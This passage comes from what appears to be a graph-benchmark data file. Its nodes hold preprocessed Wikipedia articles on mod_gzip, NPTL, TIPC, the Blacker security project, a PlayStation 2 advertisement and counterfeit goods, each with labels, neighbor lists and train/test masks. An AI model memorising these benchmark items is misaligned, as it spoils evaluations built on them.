disadvantages applications",
    "neighbors": [
      7726
    ],
    "mask": "Test"
  },
  {
    "node_id": 1583,
    "label": 8,
    "text": "Mod_gzip:mod gzip mod_gzip external extension module apache http server v1 v2 allows using gzip compression method significant reduction volume web page content served http protocol mod_gzip compiled apache either static dynamic module possible check server see sending compressed data compression compatibility browser example textual content compressed using mod_gzip maintain mime-type according recommended media type one earliest apache 1.3 versions introduced internal function regular expression evaluation function used mod_gzip evaluating filter rules therefore mod_gzip would work together apache 1.2.x earlier versions compatibility apache 1.3.x mod_gzip 1.3.y granted general apache 1.3 api n't change mod_gzip would even work together old apache 1.3 versions mod_deflate module similar mod_gzip usable apache v2 early versions mod_deflate provided lesser amount compression mod_gzip starting apache 2.0.45 compression level mod_deflate configurable using deflatecompressionlevel directive difference disappeared mod_gz module independently developed ian holsman module implements gzip compression filter apache 2.0 providing similar functionality mod_gzip one important difference two modules mod_gzip includes gzip implementation whereas mod_gz relies external zlib library php similar effect achievable output php scripts cherrypy offers gzip filter uses zlib module python standard library mod_gzip module licensed apache license module level content compression apache started mod_gzip written kevin kiley konstantin balashow autumn 2000 documented michael schröpl published remote communications inc. rci rci purchased hyperspace communications rci released code public domain developers apache 2.0.x servers included mod_deflate module codebase server perform similar gzip-encoding function mod_gzip remained external extension module",
    "neighbors": [
      865,
      8644,
      234,
      4561,
      11668
    ],
    "mask": "Train"
  },
  {
    "node_id": 1584,
    "label": 3,
    "text": "Native_POSIX_Thread_Library:native posix thread library native posix thread library nptl implementation posix threads specification linux operating system 2.6 version linux kernel processes schedulable entities special facilities threads however system call — clone — creates copy calling process copy shares address space caller linuxthreads project used system call provide kernel-level threads previous thread implementations linux worked entirely userland unfortunately partially complied posix particularly areas signal handling scheduling inter-process synchronization primitives improve upon linuxthreads clear kernel support new threading library would required two competing projects started address requirement ngpt next generation posix threads worked team included developers ibm nptl developers red hat ngpt team collaborated closely nptl team combined best features implementations nptl ngpt project subsequently abandoned mid-2003 merging best features nptl nptl first released red hat linux 9 old-style linux posix threading known trouble threads refuse yield system occasionally take opportunity preempt arises something windows known better time red hat claimed nptl fixed problem article java website java red hat linux 9 nptl part red hat enterprise linux since version 3 linux kernel since version 2.6 fully integrated part gnu c library exists tracing tool nptl called posix thread trace tool ptt open posix test suite opts written testing nptl library posix standard nptl uses similar approach linuxthreads primary abstraction known kernel still process new threads created clone system call called nptl library however nptl requires specialized kernel support implement example contended case synchronisation primitives might require threads sleep wake primitive used known futex nptl so-called 1×1 threads library threads created user via codice_1 library function 1-1 correspondence schedulable entities kernel tasks linux case simplest possible threading implementation alternative nptl 1×1 model",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      9353,
      4493,
      2195,
      5267,
      1813,
      11155,
      10780,
      1694,
      3618,
      4011,
      5677,
      9646,
      823,
      9660,
      10817,
      5067,
      8147,
      8928,
      1761,
      4841,
      9455,
      2804,
      3323,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 1585,
    "label": 4,
    "text": "Blacker_(security):blacker security blacker styled blacker u.s. department defense computer network security project designed achieve a1 class ratings trusted computer system evaluation criteria tcsec project implemented sdc burroughs first secure system trusted end-to-end encryption united states defense data network",
    "neighbors": [
      10170,
      939,
      4067
    ],
    "mask": "None"
  },
  {
    "node_id": 1586,
    "label": 5,
    "text": "Transparent_Inter-process_Communication:transparent inter-process communication transparent inter process communication tipc inter-process communication ipc service designed cluster wide operation sometimes presented cluster domain sockets contrast well-known unix domain socket service latter working single kernel features tipc tipc protocol available module mainstream linux kernel hence linux distributions tipc project also provides open source implementations protocol operating systems including wind river vxworks sun microsystems solaris tipc applications typically written c c++ utilize sockets af_tipc address family support go perl python ruby also available tipc application may use three types addresses socket bound several different service addresses ranges different sockets bound service address range bindings also qualified visibility scope i.e. node local cluster global visibility datagram messages discrete data units 1 66,000 byte length transmitted non-connected sockets like udp counterparts tipc datagrams guaranteed reach destination chances delivered still much better former link layer delivery guarantee limiting factor datagram delivery socket receive buffer size chances success also increased sender giving socket appropriate delivery importance priority datagrams transmitted three different ways connections established way tcp means accept connect sock_stream sockets however tipc client server use service addresses ranges instead port numbers ip addresses tipc also provide two alternatives standard setup scenario distinguishing property tipc connections still ability react promptly loss contact peer socket without resorting active neighbor heart-beating group messaging similar datagram messaging described end-to-end flow control hence delivery guarantee however notable differences joining group member may indicate wants receive join leave events members group feature leverages service tracking feature group member receive events member socket proper application accesses tracking service opening connection tipc internal topology server using reserved service address send one service subscription messages tracking service indicating service address range wants track return topology service sends service event messages back application whenever matching addresses bound unbound sockets within cluster service event contains found matching service range plus port node number bound/unbound socket two special cases service tracking although service subscriptions directed towards node local topology server possible establish connections nodes servers observe local bindings might useful e.g. connectivity subscriber wants create matrix connectivity across cluster limited seen local node tipc network consists individual processing elements nodes nodes either physical processors virtual machines network namespaces e.g. form docker containers nodes arranged cluster according assigned cluster identity nodes cluster identity establish links provided network set allow mutual neighbor discovery necessary change cluster identity default value nodes different clusters potentially may discover e.g. attached subnet nodes different clusters communicate using tipc linux 4.17 nodes must configured unique 32-bit node number address must comply certain restrictions linux 4.17 node 128 bit node identity must unique within node cluster node number calculated guaranteed unique hash identity node part cluster user either rely auto configuration capability node identity generated first interface attached set identity explicitly e.g. node host name uuid node part cluster identity remain default value zero neighbor discovery performed udp multicast l2 broadcast available.if broadcast/multicast support missing infrastructure discovery performed explicitly configured ip addresses cluster consists nodes interconnected one two links link constitutes reliable packet transport service sometimes referred l2.5 data link layer since linux 4.7 tipc comes unique patent pending auto-adaptive hierarchical neighbor monitoring algorithm overlapping ring monitoring algorithm reality combination ring monitoring gossip protocol makes possible establish full-mesh clusters 1000 nodes failure discovery time 1.5 seconds smaller clusters made much shorter tipc provides outstanding performance especially regarding round-trip latency times inter-node typically 33 faster tcp intra-node 2 times faster small messages 7 times faster large messages inter-node provides 10-30 lower maximal throughput tcp intra-node throughput 25-30 higher tipc team currently studying add gso/gro support intra node messaging order match tcp even designed able use kinds transport media implementations support udp ethernet infiniband vxworks implementation also supports shared memory accessed multiple instances operating system running simultaneously hardware security must currently provided transport media carrying tipc running across udp ipsec used ethernet macsec best option tipc team currently looking support tls dtls ether natively addition openssl protocol originally developed jon paul maloy ericsson 1996-2005 used company cluster applications several years subsequently released open source community integrated mainstream linux kernel since undergone numerous improvements upgrades performed dedicated tipc project team participants various companies management tool tipc part iproute2 tool package comes standard linux distributions",
    "neighbors": [
      2432,
      10242,
      8582,
      3847,
      649,
      2827,
      9868,
      2701,
      3218,
      9365,
      10005,
      11413,
      5402,
      1435,
      5531,
      6555,
      3742,
      9245,
      10271,
      9380,
      2085,
      5029,
      3751,
      3752,
      6694,
      9381,
      10924,
      5165,
      2222,
      7983,
      562,
      1586,
      2996,
      8499,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      6487,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      8554,
      4589,
      367,
      8432,
      2804,
      10486,
      6651,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1587,
    "label": 3,
    "text": "Mountain_(advertisement):mountain advertisement mountain 2003 television cinema advertisement launched sony corporation promote playstation 2 video game console budget production advertising space purchases 60-second piece amounted £5m across markets commercial depicts brazilian crowd congregating form mountain human bodies competing reach top pile campaign surrounding mountain handled advertising agency tbwa london commercial directed frank budgen production contracted gorgeous enterprises post-production mill mountain premiered 30 countries 13 november 2003 mountain part larger fun anyone series launched earlier 2003 aimed increase market share playstation 2 family demographic advertisement associated campaign critical financial success mountain nominated 40 awards professional organisations advertising television industries including film grand prix cannes lions international advertising festival considered prestigious award advertising community due large part buzz generated mountain sales 2003 christmas period exceeded expectations playstation 2 share console market increased 74 77 percent piece opens man perched edge skyscraper looking urban landscape shirley temple de gospel train film dimples begins play view switches show crowd running streets towards heaving pile people forms ramp side building everyone clambers attempt reach top slope brief celebration thrown back others new person take top spot camera zooms wide shot mountain campaign strapline fun anyone appears followed playstation 2 play world online playstation 2 released 2000 backed dark mysterious advertisements designed appeal primarily 18–24-year-old male demographic marketing campaign surrounding release proved highly successful following three years sales playstation 2 accounted 74 console market 2003 advertising agency behind playstation 2 campaign tbwa worldwide began looking ways expand sales console markets particular families young children end new set advertisements commissioned using strapline fun anyone premise campaign showcase gender-neutral family-friendly advertisements many television spots animated appeal younger children including dancing robot laughing mouths winners losers wobble new television spot concepted 2003 christmas period brief creative team ad show people competing best showcase worldwide community friendly competition surrounding playstation 2 discarding several ideas team eventually settled idea king mountain game featuring huge crowd competitors concept would eventually evolve mountain script written creative team began looking director project eventually chosen frank budgen whose work production company gorgeous enterprises number awards including 2001 film grand prix cannes lions international advertising festival nike tag considered prestigious award advertising industry mountain shot rio de janeiro brazil 1500 extras recruited local production service company zohar international six-day shoot though 500 set particular day extras included 50 stuntmen gymnasts circus performers five carefully placed cameras used capture early crowd scenes buildings backgrounds final shot taken helicopter-mounted camera 50 trained extras running climbing 20 ft cone fitted top rio sul center post-production work done mill since majority buildings backgrounds captured in-camera bulk work consisted crowd replication set extensions limited cgi work extreme wide shots crowd replication achieved using massive software time mill production company new zealand-based creators weta licensed use software mountain mill first project use software mill 3d artist jordi bares created 146,000 digital characters created individual behaviour patterns mountain first appeared 60-second television cinema spot 30 countries throughout europe asia november 13 2003 appearances backed poster campaign running november 13 december 24 posters widely distributed germany alone tbwa purchased space 315 posters inside cinemas 36 outdoors 38 oversized 3.49m posters well appearing inserts 323 foyer screens 42-second version commercial screened 36 cinemas across germany overall spend fun anyone campaign 2003 christmas period amounted £5m mountain continued air television throughout 2004 10- 30- 60-second versions despite origins united kingdom aired mainland britain july 2004 mountain critical success garnering 40 awards nominations within advertising television industries second-most-awarded commercial 2004 cog honda accord btaa craft awards mountain shortlisted ten twenty categories winning six run-up largest advertising awards ceremony year cannes lions international advertising festival mountain tipped frontrunner festival grand prix chief competition prize believed mr giant taco salad inventor bud light prison visitor vim bleach 22 members awards jury spent six days deliberating decision ultimately awarding prize mountain jury president piyush pandey commented simplicity idea magnitude execution helped mountain stand ad also received gold award excellence music category use shirley temple de gospel train campaign magazine remarked shirley temple sweet innocent vocals contrast splendidly frenzy activity onscreen despite acclaim received mountain several critics expressed concerns loose connection ad subject matter greg popp amv bbdo said piece admiration impeccable execution brave ad makes connection gaming industry thought crafted win awards bob garfield advertising age remarked mountain ad director client thus definitive example production values utterly displacing advertising raison d'etre selling goods services people exchange money addition critical success mountain succeeded achieving tbwa goal widening consumer base 18-39 males larger family demographic due large part increased interest generated mountain fun anyone campaign sales playstation 2 exceeded targets set sony console share us 13b video game market increased 74 77 period mountain aired ad resonated many public described art number viewers tbwa continued run fun anyone campaign throughout 2004 2009 continues act sony advertising agency successor playstation 2 playstation 3 director frank budgen went direct water balloons 2006 promoting competing xbox 360 console system one people outside new zealand used massive crowd multiplication software animator jordi bares mill invited give keynote masterclass artificial intelligence crowd animation uk cgi festival 2004",
    "neighbors": [
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1091,
      9543,
      10056,
      6732,
      10316,
      6738,
      6873,
      859,
      4060,
      607,
      359,
      8937,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "None"
  },
  {
    "node_id": 1588,
    "label": 4,
    "text": "Counterfeit_consumer_goods:counterfeit consumer goods counterfeit consumer goods goods often inferior quality made sold another brand name without brand owner authorization sellers goods may infringe either trademark patent copyright brand owner passing goods made brand owner counterfeit products made 5 7 world trade 2013 2014 cost estimated 2.5 million jobs worldwide 750,000 jobs lost u.s. 5 goods imported european union 2013 fakes according oecd colloquial term knockoff often used interchangeably counterfeit although legal meanings identical knockoff products copy imitate physical appearance products copy brand name logo trademark may still illegal trademark laws confuse consumers counterfeiters include producers distributors retail sellers pirated goods reproductions copyrighted products used without permission music movies software exact definitions depend laws various countries growing 10,000 last two decades counterfeit products exist virtually every industry sector including food beverages apparel accessories footwear pharmaceuticals cosmetics electronics auto parts toys currency spread counterfeit goods worldwide international chamber commerce icc 2008 estimated global value counterfeit goods 650 billion annually increasing 1.77 trillion 2015 countries including u.s. italy france among hardest hit economies thrive producing high-value products protected intellectual property rights trademarks 2017 u.s. alone estimated losing 600 billion year counterfeit goods software piracy theft copyrights trade secrets according forbes 2018 counterfeiting largest criminal enterprise world sales counterfeit pirated goods totals 1.7 trillion per year drugs human trafficking expected grow 2.8 trillion cost 5.4 million jobs 2022 according counterfeit report china produces 80 world counterfeits 're supporting china whether intention completely undermine destroy u.s. economy united states buy 60 80 products states oecd states counterfeit products encompass products made closely imitate appearance product another mislead consumers include unauthorized production distribution products protected intellectual property rights copyright trademarks trade names counterfeiters illegally copy trademarks manufacturers built based marketing investments recognized quality products order fool consumers product protected intellectual property rights target counterfeiters piotr stryszowski senior economist oecd notes scale counterfeiting alarming rapidly growing scope means product logo become target many cases different types infringements overlap unauthorized music copying mostly infringes copyright well trademarks fake toys infringe design protection counterfeiting therefore involves related issues copying packaging labeling significant features goods among leading industries seriously affected counterfeiting software music recordings motion pictures luxury goods fashion clothes sportswear perfumes toys aircraft components spare parts car accessories pharmaceuticals counterfeit pharmaceuticals profitable sector illegally copied goods lost revenues 217 billion per year fraudulent drugs known harm kill millions around world thereby damaging brand names sales major pharmaceutical manufacturers since counterfeits produced illegally manufactured comply relevant safety standards often use cheap hazardous unapproved materials cut costs manner unapproved materials hazardous consumers environment estimated oecd 2013 counterfeit goods accounted 461 billion 2.5 total world trade estimate include either domestically produced consumed products digital products sold internet estimate rose 1.8 world trade 2007 oecd concluded despite improved interception technologies problem counterfeit pirated trade diminished become major threat modern knowledge-based economies u.s. despite coordinated efforts immigration customs enforcement customs border protection cbp stem influx counterfeit goods u.s 38 increase counterfeits seized 2012 2016 test survey gao various items purchased online major brands stated certified underwriters laboratories gao found 43 nonetheless fakes approximate cost u.s. counterfeit sales estimated high 600 billion 2016 2017 report commission theft american intellectual property stated china hong kong accounted 87 percent counterfeit goods seized entering united states claimed chinese government encourages intellectual property theft utah governor jon huntsman served u.s. ambassador china stated vast illicit transfer american innovation one significant economic issues impacting u.s. competitiveness nation fully addressed looks must top priority new administration march 2017 u.s. president donald trump signed executive order among things ensure timely efficient enforcement laws protecting intellectual property rights holders imported counterfeit goods outside magazine article reminds us psychology sales role gullible consumers perhaps blindly ignoring warning signs killer deal somehow justifying buying item know fake manufacturers vendors may offer legitimate good deals factory seconds product clearance end-of-season discounts consumers simply expect buy quality name-brand goods pennies dollar report u.s. gao 2018 approximately 79 percent american population bought products online found numerous products sold online amazon walmart ebay sears newegg counterfeit 2017 estimated online sales counterfeit products amounted 1.7 trillion pew research center states worldwide e-commerce sales expected reach 4 trillion 2020 cbp reported e-commerce consumers often import export goods services allows cross-border transactions gives counterfeiters direct access consumers internet sales counterfeit goods growing exponentially according international trademark association lists number reasons buyers often know victimized online sales third 34 said victimized two three times 11 said bought fake goods three five times many online sellers amazon legally responsible selling counterfeit goods items brought attention buyer apply takedown procedure quickly remove product listing website seem entirely accurate practice counterfeit sellers lot leeway online commerce buying counterfeit goods directly smaller sellers location becoming less factor since consumers purchase products world delivered straight doors regular carriers usps fedex ups whereas previous years international counterfeiters transport counterfeits large cargo shipments criminals use small parcel mail avoid inspections rayban rolex louis vuitton copied brands worldwide nike counterfeited brand globally according organization economic co-operation development oecd counterfeit clothes shoes jewelry handbags designer brands made varying quality sometimes intent fool gullible buyer looks label know real thing looks like others put serious effort mimicking fashion details others realize consumers care goods buy counterfeit wish purchase inexpensive products popularity designer jeans 1978 spurred flood knockoffs factories manufacture counterfeit designer brand garments watches usually located developing countries 85-95 counterfeit goods coming china international tourists visiting beijing china may find wide selection counterfeit designer brand garments silk street expensive watches vulnerable counterfeiting well malaysia thailand vietnam philippines authentic looking poor quality watch fakes self-winding mechanisms fully working movements sell little us 20 good quality ones sell 100 also fakes movements materials remarkably passable quality – albeit inconsistently – may look good work well years possible consequence increasing competition within counterfeiting community counterfeiters begun manufacture goods factory authentic goods yuandan goods fakes produced factory legitimate designer pieces without authorized permission goods made scraps leftover materials genuine products produced illegally sold black market thailand opened museum counterfeit goods displaying 4,000 different items 14 different categories violate trademarks patents copyrights oldest museum kind located paris known musée de la contrefaçon fashion counterfeit goods called knock offs counterfeit goods usually sold markets street corners though purchasing goods might seemingly harmless purchasing knowingly actually funding dangerous organizations national fraud intelligence bureau england advices people buy counterfeit goods three reasons another big problem counterfeit industry people believe buying real deal people ones need protected frauded paid item believe genuine intellectual property problem seems come talking knock offs fashion lot arguments talk stealing brands logo prints side argument many designers believe counterfeiting form flattery virgil abloh white famously said “ ’ copy something ’ wanted ” many fashion houses try stop knock offs circulating louis vuitton entire team focused stopping counterfeits gucci adapted counterfeit culture designs changing spelling gucci guccy spring summer 2018 collection painting real bags counterfeit electronic components proliferated recent years including integrated circuits ics relays circuit breakers fuses ground fault receptacles cable assemblies well connectors value counterfeit electronic components estimated total 2 global sales 460 billion 2011 counterfeit devices reverse-engineered also called chinese blueprint due prevalence china produce product looks identical performs like original able pass physical electrical tests incidents involving counterfeit ics led department defense nasa create programs identify bogus parts prevent entering supply chain failed connector shut satellite quickly defective ic states product director robert hult bogus electronics also pose significant threat various sectors economy including military 2012 u.s. senate armed services committee report highlighted risks identified approximately 1,800 cases suspected counterfeit parts defense supply chain 2009 2010 counterfeit electronic parts undermine security reliability critical business systems cause massive losses revenue companies damage reputation also pose major threats health safety implanted heart pacemaker stops anti-lock braking system abs fails cell phone battery explodes 2017 oecd estimated one five 19 smartphones sold worldwide counterfeit numbers growing alibaba founder jack said need fight counterfeits way fight drunk driving african countries 60 smartphones counterfeit unfortunately nearly impossible consumers spot fake since telling difference requires higher average level technical knowledge counterfeit phones cause financial losses owners distributors legitimate devices loss tax income governments addition counterfeit phones poorly made generate high radiation contain harmful levels dangerous elements lead compact discs videotapes dvds computer software media easily copied counterfeited sold vendors street markets night markets mail order numerous internet sources including open auction sites like ebay cases counterfeit media packaging good enough mistaken genuine product sometimes sold music enthusiasts may use term bootleg recording differentiate otherwise unavailable recordings counterfeited copies commercially released material 2014 nearly 30 uk population knowingly unknowingly involved form piracy either streaming content online buying counterfeit dvds theft costing uk audiovisual industries £500m year counterfeits particularly harmful smaller independent film-makers may spent years raising money film result value intellectual property becomes eroded films less likely made 2018 u.s. agents seized 70,000 pirated copies music movies home fresno california although relatively small portion imported counterfeits according one expert china targeted motion picture association america mpaa distributing pirated movies television shows selection websites internet newsgroups peer-to-peer online networks physical locations renowned sharing illegal content presented officials countries also listed sources including russia brazil canada thailand indonesia august 2011 reported least 22 fake apple computer stores operating parts china despite others shut past authorities locations following month also china discovered people attempting re-create popular mobile game angry birds theme park without permission finnish copyright trademark owners counterfeiting countless items either large relatively cheap 3d printers growing problem sophisticated printing material ever-expanding supply digital cad designs available online contribute black market counterfeit goods gartner group estimated intellectual property loss due 3d printer counterfeiting could total 100 billion 2018 among technological fields victimized counterfeits auto aircraft parts toys medical devices drugs even human organs according one intellectual property law firm along making illicit parts almost major product fashion industry become major target counterfeiters using 3d printing ohim 2017 found approximately 10 fashion products sold worldwide counterfeits amounting approximately 28.5 billion lost revenues per year europe alone industry leaders feared budding counterfeiters would soon creating bags apparel jewelry lower production cost gaining access pirated blueprints digital files manufacturers counterfeit toys leave children exposed potentially toxic chemicals risk choking estimated 10 12 per cent toys sold uk 2017 counterfeit influx counterfeit goods coming primarily china trading standards uk safety organization seizes tens thousands toys every month prevent children coming contact according british toy hobby association btha australian toy manufacturer moose toys experienced problems counterfeiting popular shopkins toys 2015 2013 five new york-based companies accused importing hazardous counterfeit toys china merchandise seized included knockoff toys featuring popular children characters winnie pooh dora explorer spongebob squarepants betty boop teenage mutant ninja turtles power rangers spiderman tweety mickey mouse pokémon 2017 u.s. customs border protection seized 121,442 worth counterfeit children toys arrived port china destined north carolina-based importer shipment found contain multiple items bearing trademarks copyrights registered cartoon network apple inc. saban brands danjaq llc according u.s. fbi counterfeiting pharmaceuticals accounts estimated 600 billion global trade may crime 21st century add poses significant adverse health economic consequences individuals corporations alike world health organization estimates 30 pharmaceuticals developing countries fake stating anyone anywhere world come across medicines seemingly packaged right way contain correct ingredients worst-case scenario may filled highly toxic substances. ” one-third world countries lack effective drug regulatory agencies makes easy prey counterfeiters globally half counterfeit pharmaceuticals sold life-threatening conditions malaria tuberculosis hiv/aids cancer estimated one million people die year taking toxic counterfeit medication increase internet sales fake drugs easily cross international boundaries sold directly unsuspecting buyers september 2017 interpol 10-year investigation took 3,584 websites various countries removed 3,000 online ads promoting illicit pharmaceuticals arrested 400 people majority online pharmacies taken require prescription order medicines sold potentially dangerous bogus versions real drugs one target operation illicit trade opioid painkillers especially fentanyl 50 100 times stronger morphine counterfeit versions narcotics like oxycontin percocet also contain fentanyl key ingredient online pharmacies flooded us market contributed opioid epidemic centers disease control prevention cdc claiming sixty-six percent 66 63,600 overdose deaths 2016 caused opioids including fentanyl drug enforcement administration dea found customers purchase fentanyl products chinese laboratories online powdered fentanyl pill presses shipped directly buyers via regular mail services usps dhl fedex ups buyers attracted rogue online pharmacies since pose legitimate businesses consumers motivated lower prices attracted ability obtain prescription drugs without prescription drugs bought online however 90 percent found come country different one website claims 2018 report dhs u.s. food drug administration fda defines counterfeit drugs sold product name without proper authorization according economist 15 -30 antibiotic drugs africa south-east asia fake un estimated 2013 roughly half antimalarial drugs sold africa—worth 438m year—are counterfeit early 2018 29 tons counterfeit medicine seized interpol niger pfizer pharmaceuticals found fake versions least 20 products viagra lipitor legitimate supply chains least 44 countries pfizer also found nearly 20 europeans obtained medicines illicit channels amounting 12.8 billion sales experts estimate global market fake medications could worth 75 billion 200 billion year 2010 prescription drugs counterfeited plavix used treat blood clots zyprexa schizophrenia casodex used treat prostate cancer tamiflu used treat influenza including swine flu aricept used treat alzheimers eu reported 2005 india far biggest supplier fake drugs accounting 75 percent global cases counterfeit medicine however many drugs consumer products supposedly made india actually made china imported india another 7 came egypt 6 china involved production distribution include medical professionals corrupt pharmacists physicians organized crime syndicates rogue pharmaceutical companies corrupt local national officials terrorist organizations food fraud intentional adulteration food cheaper ingredients economic gain well-documented crime existed u.s. europe many decades received attention recent years fear bioterrorism increased numerous cases intentional food fraud discovered last years 2013 foods commonly listed adulterated mislabelled united states pharmacopeia convention food fraud database milk olive oil honey saffron fish coffee orange juice apple juice black pepper tea food drug administration primary regulatory body food safety enforcement united states admits sheer magnitude potential crime makes prevention difficult along fact food safety treated high priority note 300 ports entry 13 percent america food supply passes fda able inspect 2 percent food new u.s. seafood tracing regulations announced national oceanic atmospheric administration 2015 food counterfeiting serious threat europe especially countries high number trademark products italy 2005 eu customs seized 75 million counterfeited goods including foods medicines goods partly due internet sales 5 million counterfeit food-related items including drinks alcohol products seized according eu taxation customs commissioner secret wave dangerous fakes threatening people europe china counterfeit high-end wines growing beverage industry segment fakes sold chinese consumers knock-off artists refill empty bottles famous chateaux inferior vintages according one source upwardly mobile chinese eager display wealth sophistication since developed taste imported wine along foreign luxuries china wine consumption doubled since 2005 making china seventh-largest market world methods used dupe innocent consumers includes photocopying labels creating different phony chateaux names capsule label sometimes authentic bottles used another wine added using syringe problem widespread china u.s. europe auction house christie begun smashing empty bottles hammer prevent entering black market one sale 2008 french vintner shocked discover '106 bottles 107 fakes according one source counterfeit french wines sold locally abroad could take much serious amplitude asia market developing dazzling speed vintners either unable hesitant fight counterfeiters funds lawsuit costs 500,000 euros states one french vintner addition vintners like product food manufacturers prefer avoid publicity regarding fakes avoid injuring brand names counterfeit wine also found west although primarily problem collectors rare wine famous examples counterfeiting include case hardy rodenstock involved so-called jefferson bottles rudy kurniawan indicted march 2012 attempting sell faked bottles la tâche domaine de la romanée-conti clos st. denis domaine ponsot cases victims fraud high-end wine collectors including bill koch sued rodenstock kurniawan fake wines sold auction privately u.s. customs border protection suggest cosmetic industry losing 75 million annually based amount imitation products smuggled u.s. year addition lost revenue cosmetics brands damaged consumers experience unhealthy side effects eye infections allergic reactions counterfeit products customs agents seized 2,000 shipments counterfeit beauty products 2016 noted fake personal care items common knockoff handbags one biggest threats beauty consumers risk buying counterfeit products familiar 3rd party retail platforms like amazon illicit cigarettes example multi-pronged threat counterfeiting providing hundreds millions dollars per year entities rss vhp hezbollah al-qaida islamic jihad pkk counterfeit cigarettes cost taxpayers every nation billions lost revenues foisting unsuspecting public product found contain toxic substances like faeces asbestos dead flies harm arising amalgam contaminants sits top baseline hazard ascribed commercial tobacco products sales illicit cigarettes turkey example exceeding 16.2 billion cigarettes per year turkish prime minister erdogan labeled counterfeit tobacco dangerous terrorism according u.s. senate committee report 2012 reported abc news counterfeit electronic parts china 'flooding critical u.s. military systems including special operations helicopters surveillance planes putting nation troops risk report notes chinese companies take discarded electronic parts nations remove identifying marks wash refurbish resell brand-new – practice poses significant risk performance u.s. military systems must noted case however usually components counterfeit instances fabricated expected manufacturer licensee paid appropriate intellectual property rather fraudulent issuing reseller certificate conformity claims provenance traceable sometimes accompanied components remarked make appear manufactured tested stringent standards actually case however situations components fully counterfeit fairly typicaly example usb serial port dongles ostensibly manufactured ftdi prolific others practice contain general-purpose microcontroller programmed implement programming interface greater lesser extent another example electrolytic capacitors sold originating highly-regarded manufacturer practice merely shells contain lower-specification physically smaller component internally include items purport original art designer watches designer china accessories sunglasses handbags varieties antiques cases copying process proceeded several vendors possible see gradual changes cain counterfeits couterfeits progresses products frequently show sale online sites amazon ebay efforts report fraudulent receive little response november 29 2010 u.s. department homeland security seized shut 82 websites part u.s. crackdown websites sell counterfeit goods timed coincide cyber monday start holiday online shopping season attorney general eric holder announced seizing domain names disrupted sale thousands counterfeit items also cutting funds willing exploit ingenuity others personal gain. ” members congress proposed protect ip act block access foreign web sites offering counterfeit goods u.s. politicians proposing fine buy counterfeit goods sold new york canal street market europe france already created stiff sentences sellers buyers punishments 3 years prison 300,000 fine also europe non-profit organizations european anti-counterfeiting network fight global trade counterfeit goods counterfeit bust new york 2007 federal police seized 200 million fake designer clothing shoes accessories one largest-ever counterfeit smuggling rings labels seized included chanel nike burberry polo ralph lauren baby phat counterfeit goods ... major plague fashion luxury brands numerous companies made legal efforts block sale counterfeits china many goods sold retail outlets brooklyn queens trademark owners wishing identify prevent importation counterfeit goods u.s. customs border protection agency supports supplemental registration trademarks intellectual property rights e-recordation program 2017 u.s. president donald trump signed executive order among things ensure timely efficient enforcement laws protecting intellectual property rights holders imported counterfeit goods october 2011 bill introduced entitled stop online piracy act sopa bill passed would expanded ability u.s. law enforcement copyright holders fight online trafficking copyrighted intellectual property counterfeit goods bill would allowed u.s. department justice well copyright holders seek court orders websites accused enabling facilitating copyright infringement opponents bill stated could crippled internet selective censorship limiting free speech regards bill obama administration stressed important task protecting intellectual property online must threaten open innovative internet legislation later withdrawn author rep. lamar smith october 1 2011 governments eight nations including japan united states signed anti-counterfeiting trade agreement acta designed help protect intellectual property rights especially costly copyright trademark theft signing took place year diligent negotiations among 11 governments australia canada european union japan republic korea mexico morocco new zealand singapore switzerland united states eu mexico switzerland china yet signed agreement due latter critics evaluated agreement insubstantial china counterfeiting deeply rooted crackdowns shops selling counterfeit cause public protests authorities derided bourgeois puppets foreigners countries like nigeria fight brand trademark infringement national level penalties dwarfed earnings outlook counterfeiters grievous crime even worse armed robbery penalty like slap palm ridiculous fine 50,000 naira 307 offender would gladly pay fine return business next day early 2018 interpol confiscated tonnes fake products worth 25 million arrested hundreds suspects broke organized crime networks 36 different countries four continents raided markets chemists retail outlets warehouses border control points seized among things pharmaceuticals food vehicle parts tobacco products clothing agrochemicals 7.2 million counterfeit illicit items weighing 120 tonnes confiscated counterfeit products often produced violation basic human rights child labor laws human rights laws often created illegal sweatshops clothing manufacturers often rely sweatshops using children consider slave labor conditions according one organization 3,000 sweatshops around buenos aires argentina author dana thomas described conditions witnessed country sweatshops noting children workers often smuggled countries sold labor u.s. supreme court justice sonia sotomayor tried prosecute counterfeiters notes major industries suffered loss hundreds thousands jobs due exploitation child labor sweatshops new york asia often produce dangerous merchandise fake auto parts toys made toxic easily breakable materials profits often support terrorist groups drug cartels people smugglers street gangs fbi found evidence portion financing 1993 world trade center bombing came store selling counterfeit t-shirts found surrounding many organized crime activities according bruce foucart director us homeland security national intellectual property coordination centre sales counterfeit goods funded charlie hebdo attack 2016 paris left 12 people dead nearly dozen injured sales pirated cds linked funding 2004 madrid train bombing investigations firm carratu connects money counterfeit goods hezbollah al qaeda japanese yakuza eta russian mob crackdown counterfeit goods become matter human rights one national international security various countries fbi called product counterfeiting crime 21st century major internet shopping sites amazon.com ebay.com alibaba.com provide complaint pages listings counterfeit goods reported reporter must show owns intellectual property e.g trademark patent copyright presented counterfeit listings shopping site internal investigation agrees take counterfeit listing actual execution investigations least amazon ebay seems limited reality besides online market sites shift digital luxury consumer goods led promising opportunities serious risks british government released study social media luxury goods counterfeit stating 1/5 items tagged luxury good brand names instagram fakes 20 posts featured counterfeit goods accounts usually based china russia malaysia indonesia ukraine also highlights scale impact characteristics infringement sophistication counterfeiters continues grow social media platforms 2016 span 3-day period instagram identified 20,892 fake accounts selling counterfeit goods collectively responsible 14.5 million posts 146,958 new images gaining 687,817 new followers chanel 13.90 prada 9.69 louis vuitton 8.51 top affected brands according social media luxury goods counterfeit growing concern government industry consumers worldwide study washington post social media mobile applications turned ideal platforms transactions trades counterfeit users sellers would set online accounts instagram twitter facebook post counterfeit illicit products ways sponsored ads deals consumer easily contact buyers purchase counterfeit goods unknowingly email whatsapp wechat paypal social media watchdogs groups working cracking shutting accounts selling counterfeit goods counterfeiters continue operate 24 hours advanced systems algorithms artificial intelligence spambots also tactics involving automatic account creation avoid detection tax-and-duty-free law advised many brands tech platforms governments consumers require comprehensive strategy cross-sector collaboration combat 